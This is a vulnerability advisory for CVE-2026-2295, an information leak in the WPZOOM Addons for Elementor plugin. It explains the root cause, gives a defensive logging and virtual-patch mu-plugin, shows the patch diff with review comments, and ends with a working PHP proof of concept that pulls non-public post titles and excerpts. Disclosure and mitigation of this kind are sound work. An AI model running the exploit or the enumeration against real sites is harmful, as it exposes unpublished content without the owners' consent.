Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-2295: WPZOOM Addons for Elementor – Starter Templates & Widgets <= 1.3.2 – Unauthenticated Protected Post Exposure via ajax_post_grid_load_more (wpzoom-elementor-addons)

CVE ID: CVE-2026-2295
Severity: Medium (CVSS 5.3)
CWE: CWE-200
Vulnerable Version: 1.3.2
Patched Version: 1.3.3
Disclosed: February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2295:
The WPZOOM Addons for Elementor plugin contains an unauthenticated information disclosure vulnerability. The plugin’s AJAX handler for loading more posts in a grid lacks proper access controls and query restrictions. This allows any site visitor to retrieve titles and excerpts from posts with draft, pending, or future statuses, violating confidentiality. The CVSS score of 5.3 reflects a medium-severity impact on data confidentiality.

Atomic Edge research identifies the root cause in the `ajax_post_grid_load_more` function within the file `wpzoom-elementor-addons/includes/wpzoom-elementor-ajax-posts-grid.php`. The function processes requests sent to the WordPress `admin-ajax.php` endpoint. The vulnerable code constructs a `WP_Query` without any capability check on the requesting user. Critically, the query arguments array also omits the `post_status` parameter, so WordPress falls back to its default status selection, which in this request context includes non-public posts even when the request is unauthenticated.

Exploitation requires an attacker to send a POST request to `/wp-admin/admin-ajax.php`. The request must include the parameter `action` with the value `wpz_elementor_ajax_post_grid_load_more`. Additional POST parameters control the query, such as `posts_per_page`, `category`, `offset`, and `paged`. No authentication, nonce, or special headers are required. Attackers can iterate through pages or categories to systematically harvest protected content from the site.

The patch addresses the vulnerability with a single, surgical code change. In the `wpzoom-elementor-ajax-posts-grid.php` file, developers added the line `'post_status' => 'publish',` to the `$args` array for the `WP_Query`. This modification ensures the query only retrieves posts with a public status, regardless of the user's authentication state. The plugin version number in the main file was also incremented from 1.3.2 to 1.3.3.
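The effect of the 1.3.3 patch can be reproduced on a site that cannot update yet, and unauthenticated calls to the handler can be logged so that the page-by-page harvesting pattern described above is visible in the site's logs. The must-use plugin below is an added example written for this page; it is not code from WPZOOM or from the Atomic Edge PoC. It assumes only WordPress core hooks: the hook name `wp_ajax_nopriv_wpz_elementor_ajax_post_grid_load_more` follows from the `action` value named in the analysis, `wp-content/mu-plugins/` is the assumed install location, and `error_log()` stands in for whatever log sink the site uses. The reason the missing `post_status` matters is that `admin-ajax.php` runs with `is_admin()` true, and in that context a `WP_Query` with no `post_status` also selects the protected statuses shown in the admin "All" list (draft, pending, future); `pre_get_posts` fires for every `WP_Query` instance, including the one built inside the handler, so it is a suitable place to pin the status.

```php
<?php
/**
 * Plugin Name: CVE-2026-2295 virtual patch and watch (hypothetical, added example)
 * Description: Logs unauthenticated calls to the affected AJAX action and forces
 *              post_status=publish on every query run while serving it. Intended
 *              for wp-content/mu-plugins/ on sites still on <= 1.3.2 (assumption).
 */

// Action value named in the advisory; WordPress registers the unauthenticated
// handler for it under wp_ajax_nopriv_{action}.
const AE_VULN_ACTION = 'wpz_elementor_ajax_post_grid_load_more';

/**
 * Detection: record each unauthenticated call before the plugin's own handler
 * runs. Priority 1 runs ahead of the default priority 10. A burst of these
 * lines from one address with increasing "paged" values is the enumeration
 * pattern the advisory describes.
 */
function ae_log_unauth_load_more() {
    $ip    = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
    $paged = isset( $_POST['paged'] ) ? absint( $_POST['paged'] ) : 0;
    $ppp   = isset( $_POST['posts_per_page'] ) ? absint( $_POST['posts_per_page'] ) : 0;
    // error_log() is a stand-in for the site's real log sink (assumption).
    error_log( sprintf(
        'CVE-2026-2295 watch: unauthenticated %s from %s (paged=%d, posts_per_page=%d)',
        AE_VULN_ACTION,
        $ip,
        $paged,
        $ppp
    ) );
}
add_action( 'wp_ajax_nopriv_' . AE_VULN_ACTION, 'ae_log_unauth_load_more', 1 );

/**
 * Mitigation: while the vulnerable action is being served to a visitor who
 * may not edit posts, pin post_status to publish on every WP_Query in the
 * request. This is the same restriction the 1.3.3 patch hard-codes in $args.
 */
function ae_force_public_status( WP_Query $query ) {
    if ( ! wp_doing_ajax() ) {
        return; // front-end and admin page loads are untouched
    }
    $action = isset( $_REQUEST['action'] ) ? sanitize_key( $_REQUEST['action'] ) : '';
    if ( AE_VULN_ACTION !== $action ) {
        return; // only the affected handler is constrained
    }
    if ( current_user_can( 'edit_posts' ) ) {
        return; // editors may legitimately see their own non-public entries
    }
    $query->set( 'post_status', 'publish' );
}
add_action( 'pre_get_posts', 'ae_force_public_status' );
```

Because `pre_get_posts` is global, every query issued while that one AJAX action is being served is constrained, not only the grid query; for a load-more handler that is the intended effect, but it is a stopgap and should be removed once the plugin is at 1.3.3 or later.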

Successful exploitation leads to unauthorized information disclosure. Attackers can access the titles and excerpts of draft, scheduled, or pending review posts. This exposure can reveal sensitive information, unreleased announcements, or internal editorial plans. The vulnerability does not permit modification of data or full post content access. However, the leaked metadata could facilitate social engineering, competitive intelligence gathering, or reconnaissance for further attacks.

Differential between vulnerable and patched code

Code Diff
--- a/wpzoom-elementor-addons/includes/wpzoom-elementor-ajax-posts-grid.php
+++ b/wpzoom-elementor-addons/includes/wpzoom-elementor-ajax-posts-grid.php
@@ -74,6 +74,7 @@
 			self::$settings = $data;

 			$args = array(
+				'post_status'         => 'publish',
 				'posts_per_page' 	  => absint( $data['posts_per_page'] ),
 				'post__not_in'        => get_option( 'sticky_posts' ),
 				'ignore_sticky_posts' => true,
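Review bot: the added `'post_status' => 'publish',` closes the status leak, but in the same `$args` block `'posts_per_page' => absint( $data['posts_per_page'] )` still has no upper bound, so an anonymous caller can request the entire published archive in one call; cap it, for example `'posts_per_page' => min( absint( $data['posts_per_page'] ), 50 ),`. Since this handler is reachable without a nonce, a `check_ajax_referer()` call at the top of the function would also give the endpoint some protection against scripted enumeration.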
--- a/wpzoom-elementor-addons/wpzoom-elementor-addons.php
+++ b/wpzoom-elementor-addons/wpzoom-elementor-addons.php
@@ -3,13 +3,13 @@
  * Plugin Name:       Elementor Addons by WPZOOM
  * Plugin URI:        https://www.wpzoom.com/plugins/wpzoom-elementor-addons/
  * Description:       A plugin that provides a collection of Elementor Templates and advanced widgets created by the WPZOOM team
- * Version:           1.3.2
+ * Version:           1.3.3
  * Author:            WPZOOM
  * Author URI:        https://www.wpzoom.com/
  * Text Domain:       wpzoom-elementor-addons
  * License:           GNU General Public License v2
  * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
- * Requires at least: 6.0
+ * Requires at least: 6.5
  * Tested up to:      6.9
  * Elementor tested up to: 3.99
  * Elementor Pro tested up to: 3.99
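Review bot: the `Requires at least` bump from 6.0 to 6.5 is a compatibility change unrelated to the security fix and is shipped in the same release; sites running WordPress 6.0 through 6.4 fail that compatibility check and may be held back on the vulnerable 1.3.2 code. Either keep the minimum at 6.0 for this release or call the raised floor out in the changelog so administrators know they must update core before the fix reaches them.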

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2295 - WPZOOM Addons for Elementor – Starter Templates & Widgets <= 1.3.2 - Unauthenticated Protected Post Exposure via ajax_post_grid_load_more

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Construct the endpoint for the vulnerable AJAX handler
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Prepare the POST data matching the plugin's expected parameters
$post_data = array(
    'action' => 'wpz_elementor_ajax_post_grid_load_more', // The vulnerable hook
    'posts_per_page' => 10, // Number of posts to retrieve
    'offset' => 0, // Start from the first post
    'paged' => 1, // Page number
    // Additional optional parameters can be added here, e.g., 'category' => '5'
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing; enable in production
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output the results
echo "Target: $ajax_url\n";
echo "HTTP Status: $http_code\n";
echo "Response:\n";
echo $response;

// The response is expected to be JSON containing post data, including titles and excerpts.
// If the site is vulnerable, the response may include non-public posts.

?>
